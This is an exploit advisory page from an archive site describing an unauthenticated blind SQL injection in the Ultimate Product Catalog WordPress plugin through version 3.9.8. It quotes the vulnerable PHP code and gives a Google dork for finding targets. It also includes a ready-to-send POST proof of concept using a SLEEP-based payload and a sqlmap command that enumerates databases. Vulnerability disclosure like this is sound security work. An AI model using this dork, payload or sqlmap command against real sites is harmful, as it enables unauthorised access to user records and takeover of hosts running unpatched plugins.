Twenty Year Anniversary

WordPress Ultimate Product Catalog 3.9.8 SQL Injection

WordPress Ultimate Product Catalog 3.9.8 SQL Injection
Posted Jul 28, 2016
Authored by Joaquin Ramirez Martinez

WordPress Ultimate Product Catalog plugin versions 3.9.8 and below suffer from a remote unauthenticated blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 8e527d8a4cc954193e50d6e4b721af01

WordPress Ultimate Product Catalog 3.9.8 SQL Injection

Change Mirror Download
# Exploit Title: Wordpress Ultimate-Product-Catalog <= 3.9.8 (do_shortcode via ajax) Unsanitized shortcode attributes - Unauthenticated Blind SQL Injection
# Date: 2016-07-28
# Google Dork: "Index of /wp-content/plugins/ultimate-product-catalogue/"
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.EtoileWebDesign.com/ultimate-product-catalogue/
# Software Link:
# Version: <=3.9.8
# Tested on: windows 7 + firefox.

====================
DESCRIPTION
====================

A vulnerability has been discvered in the wordpress Ultimate Product Catalog by affecting v3.9.8 and below (tested).
Due to a unsanitized parameters passed to the shorcode function `Insert_Product_Catalog` [ "product-catalogue" ]
located in `/Funtions/Shortcodes.php` line 4:

function Insert_Product_Catalog($atts) {
// Select the catalogue information from the database
...

$Catalogue = $wpdb->get_row("SELECT * FROM $catalogues_table_name WHERE Catalogue_ID=" . $id);
$CatalogueItems = $wpdb->get_results("SELECT * FROM $catalogue_items_table_name WHERE Catalogue_ID=" . $id . " ORDER BY Position");
...

return $ProductString;
}

The $id parameter is extracted with `extract` function from $atts. This is a vulnerability with which can be exploited by creating shortcodes with
malicious attributes, exploitable only by administrators, editors, authors. But in file `/Functions/Process_Ajax.php` line 113...

function UPCP_Filter_Catalogue() {
$Path = ABSPATH . 'wp-load.php';
include_once($Path);

$id = $_POST['id']; <-- we can control this value!!

...

echo do_shortcode("[product-catalogue id='" . $id . "' only_inner='Yes' starting_layout='" . $start_layout . "' excluded_layouts='" . $exclude_layouts . "' current_page='" . $current_page . "' ajax_reload='" . $ajax_reload . "' ajax_url='" . $ajax_url . "' request_count='" . $request_count . "' category='" . $Category . "' subcategory='" . $SubCategory . "' tags='" . $Tags . "' custom_fields='" . $Custom_Fields . "' prod_name='" . $Prod_Name . "' min_price='" . $Min_Price . "' max_price='" . $Max_Price . "']");
}


This is interesting because that function calls `do_shortcode` executing the shortcode 'product-catalogue' as a result, this calls `Insert_Product_Catalog` wich
I found the SQLi, now we need to found a place where ` UPCP_Filter_Catalogue` is called and in line 138-139 i found...

...
add_action('wp_ajax_update_catalogue', 'UPCP_Filter_Catalogue');
add_action( 'wp_ajax_nopriv_update_catalogue', 'UPCP_Filter_Catalogue');
...

this means that we can execute that function only with a request to `/wp-admin/admin-ajax.php?action=update_catalogue` and send the vulnerable $id parameter
with our custom payload. Note that `wp_ajax_nopriv` prefix makes this vulnerability exploitable by unauthenticated users.

Example:

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue

POSTDATA: id=0+or+(our+custom+select+here)+--


An attacker can exploit this vulnerability and compromise all user records or take over control of the host machine.

==============
POC
==============
-----------------
//REQUEST
------------------

POST /wordpress/wp-admin/admin-ajax.php?action=update_catalogue HTTP/1.1
Host: localhost
Content-Length: 21
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.8
Cookie:

id=1+OR+SLEEP(10)+--+

--------------------------
EXPLOITING WITH SQLMAP
------------------------

sqlmap --url="http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue" --data="id=1" --level=5 --risk=3 --technique=B -p id --dbs --dbms=mysql

(listing all available databases)


==================================
time-line
===================================

2016-07-28: reported to vendor.
2016-07-28: vendor released plugin version 3.9.9. saying in changelog "Minor ajax update to switch to a prepared statement".
2016-07-29: public disclousure.
===================================

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close